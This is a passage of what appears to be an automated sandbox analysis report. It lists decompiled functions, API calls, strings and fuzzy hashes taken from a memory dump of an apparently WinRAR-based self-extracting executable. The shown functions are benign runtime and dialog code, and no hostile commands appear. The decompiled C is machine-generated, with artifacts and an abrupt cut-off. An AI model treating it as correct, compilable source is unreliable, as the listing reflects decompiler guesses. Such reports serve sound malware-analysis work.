0x0027be10
0x0027be11
0x0027be12
0x0027be17
0x0027be1a
0x0027be1c
0x0027be22
0x0027be24
0x0027be32
0x0027be37
0x0027be38
0x0027be38
0x0027bee2
0x0027bee2
0x0027beea
0x0027beef
0x0027bef1
0x0027bef2
0x0027bef8
0x0027bef9
0x0027beff
0x0027bf00
0x0027bf00
0x0027bf05
0x0027bf06
0x0027bf0c
0x0027bf0d
0x0027bf13
0x0027bf14
0x0027bf19
0x0027bf21
0x0027bf2d
0x0027bf2d
0x0027bf3a
0x0027bf3f
0x0027bf47
0x0027bf51
0x0027bf5e
0x0027bf65
0x0027bf65
0x0027bf71
0x0027bf78
0x0027bf7d
0x0027bf85
0x0027bf8b
0x0027bf8c
0x0027bf8d
0x0027bf8f
0x0027bf8f
0x0027bfa4
0x0027bfa9
0x0027bfb5
0x0027bfb7
0x0027bfc8
0x0027bfd5
0x00000000
0x0027bfb9
0x0027bfb9
0x0027bfc4
0x0027bfc6
0x0027bfda
0x0027bfda
0x0027bfdc
0x0027bfe2
0x0027bfe8
0x0027bff6
0x0027bffb
0x0027bffc
0x0027c004
0x0027c009
0x0027c010
0x0027c016
0x0027c018
0x0027c01e
0x0027c024
0x0027c026
0x0027c02f
0x0027c032
0x0027c034
0x0027c03d
0x0027c040
0x0027c046
0x0027c049
0x0027c052
0x0027c061
0x0027c066
0x0027c06e
0x0027c070
0x0027c071
0x0027c077
0x0027c078
0x0027c07a
0x0027c07f
0x0027c07f
0x00000000
0x0027c06e
0x00000000
0x0027bfc6
0x0027bfb7
0x00000000
0x0027c087
0x0027c087
0x0027c08a
0x0027c08c
0x0027c08c
0x00000000
0x00000000
0x0027bab8
0x0027bab8
0x0027bac0
0x0027bac6
0x0027bac9
0x0027baed
0x0027bacb
0x0027bacb
0x0027bace
0x0027bae1
0x0027bad0
0x0027bad0
0x0027bad2
0x0027bad7
0x0027bad7
0x0027bace
0x00000000
0x00000000
0x0027bb31
0x0027bb31
0x0027bb32
0x0027bb37
0x0027bb37
0x0027bb37
0x0027bb3a
0x0027bb3f
0x0027bb45
0x0027bb45
0x0027bb4b
0x0027bb51
0x0027bb51
0x00000000
0x00000000
0x0027b52a
0x0027b52c
0x0027b531
0x0027b537
0x0027b53a
0x00000000
0x0027b53c
0x0027b53c
0x00000000
0x0027b53c
0x0027b53a
0x0027c0c4
0x0027c0ca
0x0027c0d4
0x0027c0d4
0x0027bbd9
0x0027bbd9
0x0027bbe0
0x00000000
0x00000000
0x0027bbe6
0x0027bbe6
0x0027bbe8
0x0027bbef
0x0027bbf7
0x0027bbf8
0x0027bbfd
0x0027bbfe
0x0027bbff
0x0027bc01
0x0027bc55
0x0027bc55
0x0027bc5d
0x0027bc6b
0x0027bc7c
0x0027bc8a
0x0027bc8a
0x0027bc96
0x0027bc9b
0x0027bc9d
0x0027bcad
0x0027bcb7
0x0027bcbc
0x0027bcbf
0x00000000
0x0027bcc5
0x0027bcc5
0x0027bcca
0x0027bcca
0x0027bccc
0x0027bcd3
0x0027bcd9
0x00000000
0x0027bcd9
0x0027bcbf
0x0027bc03
0x0027bc05
0x0027bc07
0x0027bc0e
0x00000000
0x00000000
0x0027bc10
0x0027bc10
0x0027bc12
0x0027bc18
0x0027bc18
0x0027bc18
0x0027bc1c
0x00000000
0x00000000
0x0027bc1e
0x0027bc1e
0x0027bc1f
0x0027bc25
0x0027bc28
0x0027bc2a
0x0027bc2d
0x00000000
0x00000000
0x0027bc2f
0x00000000
0x0027bc2f
0x0027bc31
0x0027bc3c
0x0027bc46
0x0027bc4b
0x0027bc4b
0x0027bc4d
0x00000000
0x0027bcdf
0x0027bcdf
0x0027bce2
0x0027bce8
0x0027bcef
0x0027bcf1
0x0027bcf1
0x0027bcfb
0x0027bcfb
0x00000000
0x0027bce2

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0027BB71
_swprintf.LIBCMT ref: 0027BBA5

Part of subcall function 00263E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00263E54

SetDlgItemTextW.USER32(?,00000066,002A85FA), ref: 0027BBC5
_wcschr.LIBVCRUNTIME ref: 0027BBF8
EndDialog.USER32(?,00000001), ref: 0027BCD9

Strings

%s%s%u, xrefs: 0027BB9A

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: bb153d3125b6dcc7e9a2904bd651e4d34f0db8875192d002c12ee6baf9f23ffd
Instruction ID: a14b5b7df04baa8dac21092a3a84af8d7618d73f12cedeeeb0c249aabc602b6f
Opcode Fuzzy Hash: bb153d3125b6dcc7e9a2904bd651e4d34f0db8875192d002c12ee6baf9f23ffd
Instruction Fuzzy Hash: BD415E71920219AEEF26DF60DD85FEE77B8EB05304F4080A6F90DE6051EF709AA48F51

Uniqueness

Uniqueness Score: -1.00%

Function 00278FE6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00278FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00278D3F(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L00282B4E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E0028668C(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0x29df88(0,  *0x29dfd4(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0x29df90( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0x29df98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x29dfd4(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0x29df8c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E00278E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L00282B4E(_t65);
							}
						}
					}
				}
				return _t43;
			}

0x00278fef
0x00278ff3
0x00278ff9
0x00278ffc
0x00278fff
0x0027900b
0x00279014
0x00279019
0x0027901e
0x00279024
0x0027902a
0x0027902e
0x00279026
0x00279026
0x00279026
0x00279034
0x0027903b
0x00279044
0x0027905b
0x00279065
0x0027906a
0x0027906a
0x00279070
0x0027907e
0x002790ab
0x002790b1
0x002790b8
0x002790f2
0x002790f4
0x002790f9
0x00000000
0x00279102
0x002790ba
0x002790bc
0x002790c3
0x002790c6
0x002790cd
0x002790d2
0x002790d6
0x002790db
0x002790e3
0x00000000
0x002790ef
0x002790d6
0x002790c6
0x002790bc
0x0027910e

APIs

ShowWindow.USER32(?,00000000), ref: 00278FFF
GetWindowRect.USER32(?,00000000), ref: 00279044
ShowWindow.USER32(?,00000005), ref: 002790DB
SetWindowTextW.USER32(?,00000000), ref: 002790E3
ShowWindow.USER32(00000000,00000005), ref: 002790F9

Strings

RarHtmlClassName, xrefs: 002790A5

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: a0ea320619da8344720c088608291057f3926d03694981cf931d1149159dc123
Instruction ID: 9dbe05818b211345b54e3439ad9ca73177873af5edc44ced11412e80748e1d2b
Opcode Fuzzy Hash: a0ea320619da8344720c088608291057f3926d03694981cf931d1149159dc123
Instruction Fuzzy Hash: DA31A031014311EFCB21AF64EC4DB5BBBA8EF48711F00855AF94EAA196CB31D860DF61

Uniqueness

Uniqueness Score: -1.00%

Function 0028B506, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0028B506(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0028B4CA(_t45, 7);
					E0028B4CA(_t45 + 0x1c, 7);
					E0028B4CA(_t45 + 0x38, 0xc);
					E0028B4CA(_t45 + 0x68, 0xc);
					E0028B4CA(_t45 + 0x98, 2);
					E00287A50( *((intOrPtr*)(_t45 + 0xa0)));
					E00287A50( *((intOrPtr*)(_t45 + 0xa4)));
					E00287A50( *((intOrPtr*)(_t45 + 0xa8)));
					E0028B4CA(_t45 + 0xb4, 7);
					E0028B4CA(_t45 + 0xd0, 7);
					E0028B4CA(_t45 + 0xec, 0xc);
					E0028B4CA(_t45 + 0x11c, 0xc);
					E0028B4CA(_t45 + 0x14c, 2);
					E00287A50( *((intOrPtr*)(_t45 + 0x154)));
					E00287A50( *((intOrPtr*)(_t45 + 0x158)));
					E00287A50( *((intOrPtr*)(_t45 + 0x15c)));
					return E00287A50( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x0028b50c
0x0028b511
0x0028b51a
0x0028b525
0x0028b530
0x0028b53b
0x0028b549
0x0028b554
0x0028b55f
0x0028b56a
0x0028b578
0x0028b586
0x0028b597
0x0028b5a5
0x0028b5b3
0x0028b5be
0x0028b5c9
0x0028b5d4
0x00000000
0x0028b5e4
0x0028b5e9

APIs

Part of subcall function 0028B4CA: _free.LIBCMT ref: 0028B4F3

_free.LIBCMT ref: 0028B554

Part of subcall function 00287A50: HeapFree.KERNEL32(00000000,00000000), ref: 00287A66
Part of subcall function 00287A50: GetLastError.KERNEL32(?,?,0028B4F8,?,00000000,?,00000000,?,0028B51F,?,00000007,?,?,0028B91C,?,?), ref: 00287A78

_free.LIBCMT ref: 0028B55F
_free.LIBCMT ref: 0028B56A
_free.LIBCMT ref: 0028B5BE
_free.LIBCMT ref: 0028B5C9
_free.LIBCMT ref: 0028B5D4
_free.LIBCMT ref: 0028B5DF

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
Instruction ID: 5d2e26c74929ca81eaf1d6594521cc8e7e2311dd9b9792a06f18710df41479a2
Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
Instruction Fuzzy Hash: 99111D76562704A6E521B7B0CC57FCF779C6F00B01F404819B69E660D3D7B9B5244B60

Uniqueness

Uniqueness Score: -1.00%

Function 00281694, Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00281694(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x29d680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E0028288E(__eflags,  *0x29d680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E002828C8(__eflags,  *0x29d680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00287B1B(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E002828C8(__eflags,  *0x29d680, 0);
								} else {
									__eflags = E002828C8(__eflags,  *0x29d680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00287A50(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x0028169b
0x002816ae
0x002816b5
0x002816b8
0x002816bb
0x002816d4
0x002816d4
0x002816bd
0x002816bd
0x002816bf
0x002816c9
0x002816cf
0x002816d0
0x002816d2
0x002816e2
0x002816e6
0x002816e8
0x002816fc
0x002816fc
0x00281705
0x002816ea
0x002816f8
0x002816fa
0x0028170e
0x00281710
0x00281710
0x00000000
0x00000000
0x00000000
0x002816fa
0x00281713
0x00000000
0x00000000
0x00000000
0x002816d2
0x002816bf
0x0028171b
0x00281725
0x0028169d
0x0028169f
0x0028169f

APIs

GetLastError.KERNEL32(?,?,0028168B,0027F0E2), ref: 002816A2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002816B0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002816C9
SetLastError.KERNEL32(00000000,?,0028168B,0027F0E2), ref: 0028171B

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e3f384273d132c556bf54a3f77abb57108b3687700e73851708608a421e644fd
Instruction ID: 2e6a55a6c6d7583a3a1e3f303fc7c39fac258e8202c848a874855aa4ced9ea13
Opcode Fuzzy Hash: e3f384273d132c556bf54a3f77abb57108b3687700e73851708608a421e644fd
Instruction Fuzzy Hash: D201D43E2BB222AEAB253E757C899262B4CEB11375730022EF114450E2FF514C36AB64

Uniqueness

Uniqueness Score: -1.00%

Function 0027D27B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0027D27B() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0x2bfe58;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0x2bfe5c = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0x2bfe60 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}

0x0027d27b
0x0027d286
0x0027d28e
0x0027d2a0
0x0027d2a4
0x0027d2b0
0x0027d2b8
0x00000000
0x0027d2ba
0x0027d2c0
0x0027d2c5
0x0027d2cd
0x00000000
0x0027d2cf
0x0027d2cf
0x0027d2cf
0x0027d2cd
0x0027d2a6
0x0027d2a6
0x0027d2a6
0x0027d2a6
0x0027d2dd
0x0027d2e3
0x0027d2eb
0x0027d2f1
0x00000000
0x00000000
0x00000000
0x0027d2ed
0x0027d2ed
0x0027d2ed
0x0027d2ed
0x0027d2f5
0x0027d290
0x0027d293
0x0027d293
0x0027d288
0x0027d28b
0x0027d28b

Strings

ReleaseSRWLockExclusive, xrefs: 0027D2BA
AcquireSRWLockExclusive, xrefs: 0027D2AA
KERNEL32.DLL, xrefs: 0027D295

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 5a52f8b82a225d4b332d929b43a66d1d9c193fba21b26a76a2a84e9a7310a529
Instruction ID: 3b2cd3a831d9ecb25ec165379df0a62cd3ffe7e32032f5ceaf39137e5e1659b6
Opcode Fuzzy Hash: 5a52f8b82a225d4b332d929b43a66d1d9c193fba21b26a76a2a84e9a7310a529
Instruction Fuzzy Hash: 0201F471771263AB4F706FB86C989A723A49E53756310813BEC08D3213E771C867D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00270910, Relevance: 9.1, APIs: 6, Instructions: 94
timeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00270910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				intOrPtr _t47;
				long _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v48.wYear =  *_t66;
				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E0026A995() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t61 = _v72.dwHighDateTime.dwLowDateTime;
						_t72 = _v72.dwLowDateTime;
					}
					 *_t76 = E0027DDC0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t47 =  *((intOrPtr*)(_t66 + 0x18));
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}

0x00270910
0x00270914
0x00270923
0x00270925
0x0027092e
0x00270937
0x00270940
0x00270949
0x00270952
0x00270959
0x0027095e
0x00270972
0x00270a0e
0x00270a10
0x00270978
0x00270984
0x002709aa
0x002709bb
0x002709cb
0x002709d7
0x002709df
0x002709e5
0x002709ed
0x002709f3
0x002709f5
0x002709f9
0x00270986
0x00270990
0x00270996
0x0027099a
0x0027099a
0x00270a05
0x00270a07
0x00270a07
0x00270a13
0x00270a16
0x00270a18
0x00270a22

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 0027096E

Part of subcall function 0026A995: GetVersionExW.KERNEL32(?), ref: 0026A9BA

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00270990
FileTimeToSystemTime.KERNEL32(?,?), ref: 002709AA
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 002709BB
SystemTimeToFileTime.KERNEL32(?,?), ref: 002709CB
SystemTimeToFileTime.KERNEL32(?,?), ref: 002709D7

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 1be64cb8878d74bec4656fe46d7d19d70ae4f403320fa6389dbdc4fd06bb21ad
Instruction ID: 6476eedb656787cc56a014e6aa3682d84ca62b38f0bcb0f541ec6584beef7ebf
Opcode Fuzzy Hash: 1be64cb8878d74bec4656fe46d7d19d70ae4f403320fa6389dbdc4fd06bb21ad
Instruction Fuzzy Hash: 7831C47A118346DAC700DFA5D8849ABB7F8BF98704F04491EFA99D3210E730D559CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00278BE2, Relevance: 9.1, APIs: 6, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00278BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t16;
				signed int _t22;
				void* _t25;
				signed int _t30;
				signed int* _t34;

				_t34 = _a12;
				if(_t34 != 0) {
					_t32 = _a8;
					_t25 = 0x10;
					if(E0027F3CA(_a8, 0x2940bc, _t25) == 0) {
						L13:
						_t30 = _a4;
						 *_t34 = _t30;
						L14:
						 *((intOrPtr*)( *_t30 + 4))(_t30);
						_t16 = 0;
						L16:
						return _t16;
					}
					if(E0027F3CA(_t32, 0x2940fc, _t25) != 0) {
						if(E0027F3CA(_t32, 0x2940dc, _t25) != 0) {
							if(E0027F3CA(_t32, 0x2940ac, _t25) != 0) {
								if(E0027F3CA(_t32, 0x29414c, _t25) != 0) {
									if(E0027F3CA(_t32, 0x29409c, _t25) != 0) {
										 *_t34 =  *_t34 & 0x00000000;
										_t16 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t30 = _a4;
								_t22 = _t30 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t34 =  ~_t30 & _t22;
								goto L14;
							}
							_t30 = _a4;
							_t22 = _t30 + 0xc;
							goto L11;
						}
						_t30 = _a4;
						_t22 = _t30 + 8;
						goto L11;
					}
					_t30 = _a4;
					_t22 = _t30 + 4;
					goto L11;
				}
				return 0x80004003;
			}

0x00278be6
0x00278beb
0x00278bf9
0x00278bfe
0x00278c10
0x00278c9f
0x00278c9f
0x00278ca2
0x00278ca4
0x00278ca7
0x00278caa
0x00278cb6
0x00000000
0x00278cb7
0x00278c27
0x00278c42
0x00278c5d
0x00278c78
0x00278c9d
0x00278cae
0x00278cb1
0x00000000
0x00278cb1
0x00000000
0x00278c9d
0x00278c7a
0x00278c7d
0x00278c80
0x00278c84
0x00278c88
0x00000000
0x00278c88
0x00278c5f
0x00278c62
0x00000000
0x00278c62
0x00278c44
0x00278c47
0x00000000
0x00278c47
0x00278c29
0x00278c2c
0x00000000
0x00278c2c
0x00000000

APIs

_memcmp.LIBVCRUNTIME ref: 00278C06
_memcmp.LIBVCRUNTIME ref: 00278C1D

Memory Dump Source

Source File: 00000004.00000002.480056994.0000000000261000.00000020.00020000.sdmp, Offset: 00260000, based on PE: true

Associated: 00000004.00000002.480050872.0000000000260000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480088820.0000000000292000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.480163517.000000000029D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480195856.00000000002A4000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480231143.00000000002C0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.480241061.00000000002C1000.00000002.00020000.sdmp Download File

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: ff321d9516269ea99f3fadd8511cd0ad08e6a00ab1007940a2d1711c1cd52879
Instruction ID: c6d4f998059a17a83b77503b28cdde363f0f885cfd1ea08b73aef65cd4043130
Opcode Fuzzy Hash: ff321d9516269ea99f3fadd8511cd0ad08e6a00ab1007940a2d1711c1cd52879
Instruction Fuzzy Hash: 6F212B716B520BABDB1D6E10CD82F3B77AC9B50744F04C52EFC0C9A141F630EC6186A1

Uniqueness

Uniqueness Score: -1.00%

Function 00288516, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00288516(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x29d6ac; // 0x4
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00287B1B(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00289BA9(_t25, _t36, __eflags,  *0x29d6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00288388(_t25, _t31, 0x2c0418);
							E00287A50(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00287A50();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00287AD8(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x29d6ac; // 0x4
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00287B1B(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00289BA9(_t27, _t37, __eflags,  *0x29d6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00288388(_t27, _t32, 0x2c0418);
									E00287A50(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00287A50();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00289B53(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00289B53(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00288516
0x00288516
0x00288516
0x00288520
0x00288522
0x00288527
0x0028852a
0x00288538
0x0028853f
0x00288544
